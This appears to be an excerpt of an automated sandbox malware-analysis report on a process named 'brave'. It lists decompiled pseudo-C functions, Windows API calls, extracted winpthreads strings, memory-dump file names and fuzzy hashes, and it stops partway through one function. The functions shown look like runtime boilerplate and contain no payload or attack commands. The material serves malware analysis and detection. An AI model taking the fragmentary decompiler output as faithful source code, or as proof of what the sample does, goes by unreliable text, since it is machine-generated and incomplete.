				asm("ud2");
				_v184 = 0;
				_t53 =  *0x10;
				asm("ud2");
				0;
				E00007FF77FF715BA0980(0x15e42d20, 0x15e46c50);
				 *0x15e42d38 = 0x12400; // executed
				malloc(_t95); // executed
				 *0x15e42d30 = _t53;
				if (_t53 == 0) goto 0x15bc2789;
				 *0x15e42d28 = _t53;
				 *_t53 = 0x12400;
				 *((long long*)(_t53 + 8)) = 0;
				goto E00007FF77FF715B91520;
				 *0x15e42d38 = 0;
				 *0x15e42d28 = 0;
				goto 0x15bc2779;
				0;
				0;
				0;
			}

0x7ff715bc2540
0x7ff715bc254b
0x7ff715bc254e
0x7ff715bc2564
0x7ff715bc2569
0x7ff715bc256f
0x7ff715bc2577
0x7ff715bc2580
0x7ff715bc2582
0x7ff715bc2590
0x7ff715bc259b
0x7ff715bc259e
0x7ff715bc25b4
0x7ff715bc25b9
0x7ff715bc25bf
0x7ff715bc25c7
0x7ff715bc25d0
0x7ff715bc25d2
0x7ff715bc25e0
0x7ff715bc25eb
0x7ff715bc25ee
0x7ff715bc2604
0x7ff715bc2609
0x7ff715bc260f
0x7ff715bc2617
0x7ff715bc2620
0x7ff715bc2630
0x7ff715bc263b
0x7ff715bc263e
0x7ff715bc2654
0x7ff715bc265f
0x7ff715bc2667
0x7ff715bc2670
0x7ff715bc2681
0x7ff715bc2683
0x7ff715bc2694
0x7ff715bc2696
0x7ff715bc26a7
0x7ff715bc26a9
0x7ff715bc26ba
0x7ff715bc26bc
0x7ff715bc26c7
0x7ff715bc26c9
0x7ff715bc26da
0x7ff715bc26dc
0x7ff715bc26ed
0x7ff715bc26ef
0x7ff715bc2700
0x7ff715bc2702
0x7ff715bc2713
0x7ff715bc2715
0x7ff715bc271e
0x7ff715bc2726
0x7ff715bc272e
0x7ff715bc273d
0x7ff715bc2747
0x7ff715bc2752
0x7ff715bc2757
0x7ff715bc2761
0x7ff715bc2763
0x7ff715bc276a
0x7ff715bc2771
0x7ff715bc2784
0x7ff715bc2789
0x7ff715bc2794
0x7ff715bc279f
0x7ff715bc27a7
0x7ff715bc27ab
0x7ff715bc27af

APIs

Part of subcall function 00007FF715BC19A0: malloc.MSVCRT(?,?,?,?,00007FF715BC23B5,?,?,?,?,00007FF715B93C24), ref: 00007FF715BC19B1

Part of subcall function 00007FF715BBA7A0: strlen.MSVCRT ref: 00007FF715BBA7CB

Part of subcall function 00007FF715B9FEC0: RtlCaptureContext.KERNEL32 ref: 00007FF715B9FF45
Part of subcall function 00007FF715B9FEC0: RtlUnwindEx.KERNEL32 ref: 00007FF715B9FF63
Part of subcall function 00007FF715B9FEC0: abort.MSVCRT ref: 00007FF715B9FF69

Part of subcall function 00007FF715BB9850: strlen.MSVCRT ref: 00007FF715BB987B

Part of subcall function 00007FF715BBA970: strlen.MSVCRT ref: 00007FF715BBA99B

Part of subcall function 00007FF715BBAAF0: strlen.MSVCRT ref: 00007FF715BBAB1B

malloc.MSVCRT ref: 00007FF715BC2752

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: strlen$malloc$CaptureContextUnwindabort
String ID:
API String ID: 3412053993-0
Opcode ID: 93d5ee2c6aaf0008122d9e70a301f82916df8bd8c2d61856d1b3d42c2f024549
Instruction ID: e4ebf7b94c99e455c5f68ffd1ec2ba4e354f89bce1f264792065e3e095b1244e
Opcode Fuzzy Hash: 93d5ee2c6aaf0008122d9e70a301f82916df8bd8c2d61856d1b3d42c2f024549
Instruction Fuzzy Hash: AB512071E19E0680E638BB16E8553B6A360BB45FA9FC01435E98D5B3B2CF7CD14C8368

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA7060 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 157
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF715BA7068
CreateMutexA.KERNEL32 ref: 00007FF715BA7177
WaitForSingleObject.KERNEL32 ref: 00007FF715BA7188
FindAtomA.KERNEL32 ref: 00007FF715BA719D
AddAtomA.KERNEL32 ref: 00007FF715BA71DD
_onexit.MSVCRT ref: 00007FF715BA71FA
ReleaseMutex.KERNEL32 ref: 00007FF715BA7202
CloseHandle.KERNEL32 ref: 00007FF715BA720B

Strings

aaaaaaaa, xrefs: 00007FF715BA711E
failed to get string from atom, xrefs: 00007FF715BA72F6
__shmem3_winpthreads_tdm_, xrefs: 00007FF715BA70B7, 00007FF715BA70E7
__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAAaaaAaAaAAAAaaAaAaaaAaAaaaaaaaaa, xrefs: 00007FF715BA70DB, 00007FF715BA7196, 00007FF715BA71D6, 00007FF715BA7227
aaaaaaaa, xrefs: 00007FF715BA7114
failed to add string to atom table, xrefs: 00007FF715BA72C3
failed to to lock creation mutex, xrefs: 00007FF715BA72D6
EaBeAaAa__shmem3_winpthreads_tdm_, xrefs: 00007FF715BA706E, 00007FF715BA712F

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
String ID: EaBeAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAAaaaAaAaAAAAaaAaAaaaAaAaaaaaaaaa$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
API String ID: 2382646235-1290837784
Opcode ID: a7566c4363776fb2f142f84513ee5a94bc791e29e32db4c34a702c3beaa6482f
Instruction ID: ec6cf453ce276eae2b4cf9964d1916855d69a38c46c2d500f99f7913a0b9e7ec
Opcode Fuzzy Hash: a7566c4363776fb2f142f84513ee5a94bc791e29e32db4c34a702c3beaa6482f
Instruction Fuzzy Hash: 0B616579E1CE4281EA2EAB15E9012B6A7A1BF55FA5FC44035D58E4B270EF7CE50D8320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA3520 Relevance: 24.4, APIs: 16, Instructions: 450
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BA3520(void* __edx, void* __r8) {

				if (__edx != 0) goto 0x15ba3548;
				if (__r8 == 0) goto 0x15ba3588;
				return 1;
			}

0x7ff715ba352d
0x7ff715ba3532
0x7ff715ba3544

APIs

RemoveVectoredExceptionHandler.KERNEL32 ref: 00007FF715BA3594
TlsGetValue.KERNEL32 ref: 00007FF715BA35ED
CloseHandle.KERNEL32 ref: 00007FF715BA362B
CloseHandle.KERNEL32 ref: 00007FF715BA3638
TlsSetValue.KERNEL32 ref: 00007FF715BA36A5

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CloseHandleValue$ExceptionHandlerRemoveVectored
String ID:
API String ID: 2941551293-0
Opcode ID: 67c97d2b0fe632f4fb20c12def0e5228ddbe2ecb36f3870be98da43108ad0dd3
Instruction ID: aa7900d34ca5af8ff2292b67b3d26e2f80be57535053d823beb705208e666f85
Opcode Fuzzy Hash: 67c97d2b0fe632f4fb20c12def0e5228ddbe2ecb36f3870be98da43108ad0dd3
Instruction Fuzzy Hash: 6022E421A0AF0A85EA7ABB15D4543B9A7A0EF44FA4F840536DA1D473B1DFBCE44CC321

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA6F70 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32 ref: 00007FF715BA6F81
WaitForSingleObject.KERNEL32 ref: 00007FF715BA6F92
FindAtomA.KERNEL32 ref: 00007FF715BA6FFF
ReleaseMutex.KERNEL32 ref: 00007FF715BA700D
CloseHandle.KERNEL32 ref: 00007FF715BA7016
CloseHandle.KERNEL32 ref: 00007FF715BA7037

Strings

__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAAaaaAaAaAAAAaaAaAaaaAaAaaaaaaaaa, xrefs: 00007FF715BA6FF8
failed to to lock cleanup mutex, xrefs: 00007FF715BA7028
EaBeAaAa__shmem3_winpthreads_tdm_, xrefs: 00007FF715BA6F7A

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
String ID: EaBeAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAAaaaAaAaAAAAaaAaAaaaAaAaaaaaaaaa$failed to to lock cleanup mutex
API String ID: 3776795807-3304243848
Opcode ID: f862491ff4c3ba5945405b97c927dcecf34c299a1984f3d4105c76ec3890af5a
Instruction ID: 92d2fbbe7c1dee24b926d4c503de7f5f5f0b7073185ada7d37dc890ebec02dcc
Opcode Fuzzy Hash: f862491ff4c3ba5945405b97c927dcecf34c299a1984f3d4105c76ec3890af5a
Instruction Fuzzy Hash: C2214165E19E4281EE7EBB51D55413AA2A1BF44FA5BC49435D80E4B3B0EF3CE84DC320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA2D40 Relevance: 16.7, APIs: 11, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00007FF77FF715BA2D40(void* __ecx, void* __rdx) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* _t6;
				void* _t9;
				void* _t10;
				void* _t11;
				intOrPtr _t18;
				intOrPtr _t19;
				void* _t22;
				void* _t26;
				intOrPtr* _t27;
				void* _t28;
				void* _t30;
				void* _t31;
				void* _t32;

				_t27 =  *0x15e46920; // 0x7ff715e51400
				_t18 =  *_t27;
				if (_t18 == 0) goto 0x15ba2f30;
				if ( *((long long*)(_t18 + 0x28)) != 0) goto 0x15ba2f18;
				 *((long long*)(_t18 + 0x28)) = 0x15e513c8;
				if ( *0x15e513c8 == 1) goto 0x15ba2f25;
				E00007FF77FF715BA2350(_t9, _t10, _t11,  *0x15e513c8 - 1, _t18, _t22, 0x15e513c8, _t26, _t27, _t28, _t30, _t31, _t32);
				_t19 =  *_t27;
				if (_t19 == 0) goto 0x15ba2dc0;
				if ( *((long long*)(_t19 + 0x30)) != 0) goto 0x15ba2de0;
				 *((long long*)(_t19 + 0x30)) = 0x15e42bd8;
				_t6 = TlsGetValue(??);
				if (0x15e42bd8 == 0) goto 0x15ba2df4;
				return _t6;
			}

0x7ff715ba2d4a
0x7ff715ba2d51
0x7ff715ba2d57
0x7ff715ba2d62
0x7ff715ba2d72
0x7ff715ba2d76
0x7ff715ba2d7c
0x7ff715ba2d81
0x7ff715ba2d87
0x7ff715ba2d8e
0x7ff715ba2d97
0x7ff715ba2da0
0x7ff715ba2dac
0x7ff715ba2dbb

APIs

TlsGetValue.KERNEL32 ref: 00007FF715BA2DA0

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7a2b5f52572ddb7f3fab963f5045169fe13579b7e3dcc0f1855f9a6abb98b3e6
Instruction ID: 22a79781f20b592fe95cb749561a3c0cb838d1c37df6f457cbc3e6f9b6de8678
Opcode Fuzzy Hash: 7a2b5f52572ddb7f3fab963f5045169fe13579b7e3dcc0f1855f9a6abb98b3e6
Instruction Fuzzy Hash: 4F713732A19F5285EB7AAF25D451369B6A0FB44FA4F840235DA5D473B1EF3CE448C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B94090 Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF715B940C1
wcslen.MSVCRT ref: 00007FF715B94117

Part of subcall function 00007FF715BBDEF0: memcpy.MSVCRT ref: 00007FF715BBDF96
Part of subcall function 00007FF715BBDEF0: memcpy.MSVCRT ref: 00007FF715BBDFC1

wcslen.MSVCRT ref: 00007FF715B941B7
memcpy.MSVCRT ref: 00007FF715B942E6

Strings

@, xrefs: 00007FF715B9426B
0, xrefs: 00007FF715B94260
basic_string::_M_construct null not valid, xrefs: 00007FF715B94300
, xrefs: 00007FF715B941CE
\??\, xrefs: 00007FF715B94110, 00007FF715B94129

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpywcslen
String ID: $0$@$\??\$basic_string::_M_construct null not valid
API String ID: 982415701-2971582370
Opcode ID: b5d247323698149d340c130ac0e6dd9a73dea5bbab17d57a17569d1199411ecf
Instruction ID: 837b421a65dc446732aa654ab9b8eaaa54e47a9625ec8f1062451bd1f9091b36
Opcode Fuzzy Hash: b5d247323698149d340c130ac0e6dd9a73dea5bbab17d57a17569d1199411ecf
Instruction Fuzzy Hash: B561343261CBC085E6349B15F4503ABB7A0FB88BA4F944225DA9D47BA9DF7CC008CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA0230 Relevance: 12.1, APIs: 8, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FF77FF715BA0230(intOrPtr* __rax, void* __rcx) {
				void* _t5;
				intOrPtr _t6;
				intOrPtr* _t11;
				intOrPtr _t13;

				_t11 = __rax;
				_t13 =  *((intOrPtr*)(__rcx + 0x10));
				if (_t13 == 0) goto 0x15ba0288;
				_t6 =  *0x15e51370; // 0x1
				_t5 = E00007FF77FF715BA5260(_t6, __rax);
				if (_t11 == 0) goto 0x15ba02c8;
				if ( *_t11 - _t13 < 0) goto 0x15ba0370;
				if ( *((intOrPtr*)(_t11 + 8 + (_t13 - 1) * 8)) == 0) goto 0x15ba0310;
				return _t5;
			}

0x7ff715ba0230
0x7ff715ba023a
0x7ff715ba0244
0x7ff715ba0246
0x7ff715ba024c
0x7ff715ba0257
0x7ff715ba025f
0x7ff715ba0271
0x7ff715ba0284

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1187da6e171b2e77c5614d760d31e22034ad26bdc6425de355795f4ea1b5fa90
Instruction ID: 9087a17f169b7555eb68620f5e41f198062b67d2cc01710692e4f900c52d5139
Opcode Fuzzy Hash: 1187da6e171b2e77c5614d760d31e22034ad26bdc6425de355795f4ea1b5fa90
Instruction Fuzzy Hash: C6518422A15F0A81EA3ABF15D4505B9A2A4BF54FA4FD88535DA4D073B1EF3CE54DC320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B939D0 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF715B93A58

Part of subcall function 00007FF715BBDEF0: memcpy.MSVCRT ref: 00007FF715BBDF96
Part of subcall function 00007FF715BBDEF0: memcpy.MSVCRT ref: 00007FF715BBDFC1

wcslen.MSVCRT ref: 00007FF715B93AE6
memcpy.MSVCRT ref: 00007FF715B93BFE

Strings

0, xrefs: 00007FF715B93B4A
basic_string::_M_construct null not valid, xrefs: 00007FF715B93C18
\??\, xrefs: 00007FF715B93A51, 00007FF715B93A6A
@, xrefs: 00007FF715B93B55
, xrefs: 00007FF715B93AEB

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpy$wcslen
String ID: $0$@$\??\$basic_string::_M_construct null not valid
API String ID: 1844840824-2971582370
Opcode ID: ee05ecdc9710429fa0aab71fa4d1ecee077df793fd946b12f4536450c2e0f0d3
Instruction ID: 7e8c7dcc554f47059f9c7424ccbb8d7f786a07d26308e81138dcc03efed29b3e
Opcode Fuzzy Hash: ee05ecdc9710429fa0aab71fa4d1ecee077df793fd946b12f4536450c2e0f0d3
Instruction Fuzzy Hash: 2A518C72608F8581E674EB15E4503AAF3A0FBC4BA4F945135EA8D43BA9DF7CD408CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B93CD0 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF715B93D01
wcslen.MSVCRT ref: 00007FF715B93D57

Part of subcall function 00007FF715BBDEF0: memcpy.MSVCRT ref: 00007FF715BBDF96
Part of subcall function 00007FF715BBDEF0: memcpy.MSVCRT ref: 00007FF715BBDFC1

wcslen.MSVCRT ref: 00007FF715B93DF7
memcpy.MSVCRT ref: 00007FF715B93F26

Strings

@, xrefs: 00007FF715B93EAB
basic_string::_M_construct null not valid, xrefs: 00007FF715B93F40
0, xrefs: 00007FF715B93EA0
\??\, xrefs: 00007FF715B93D50, 00007FF715B93D69

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpywcslen
String ID: 0$@$\??\$basic_string::_M_construct null not valid
API String ID: 982415701-2209788446
Opcode ID: 94939aa4065493588ff229156f05ba003bfbe37133c0b9f2618c22385aa06220
Instruction ID: 14c43033edc8f8172013e1238ea63a5ed9f17562c144095bd20d15688b15f6a1
Opcode Fuzzy Hash: 94939aa4065493588ff229156f05ba003bfbe37133c0b9f2618c22385aa06220
Instruction Fuzzy Hash: D7614432609FC185E774AB15E4513AAF7A0FBC8BA4F844225DA8C47BA9DF7CC048CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B928A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00007FF77FF715B928A0(void* __ecx, void* __edi, void* __esp, void* __rax, void* __rdx, long long __r8, long long __r9, intOrPtr _a4, long long _a12, long long _a20, long long _a28, long long _a36, long long _a44, long long _a60, long long _a64, long long _a68, long long _a76, long long _a84, char _a100, void* _a112, char _a224, char _a65824, long long _a65832) {
				long long _v4;
				long long _v12;
				void* _t32;
				void* _t33;
				intOrPtr* _t49;
				intOrPtr* _t50;

				E00007FF77FF715B9F680(0x10108);
				_a65824 = __r8;
				r8d = 0xfffe;
				_t33 = __ecx;
				_a65832 = __r9;
				memset(??, ??, ??);
				_a64 =  &_a65824;
				E00007FF77FF715BAA220(__ecx,  &_a224, __rdx, __rdx,  &_a65824);
				r9d = 0;
				memset(__edi, 0, 0xd << 0);
				_a36 =  &_a68;
				_a28 =  &_a100;
				_t49 =  *0x15e46640; // 0x7ff715e51078
				_a44 =  &_a60;
				_a100 = 0x68;
				_a68 = 0;
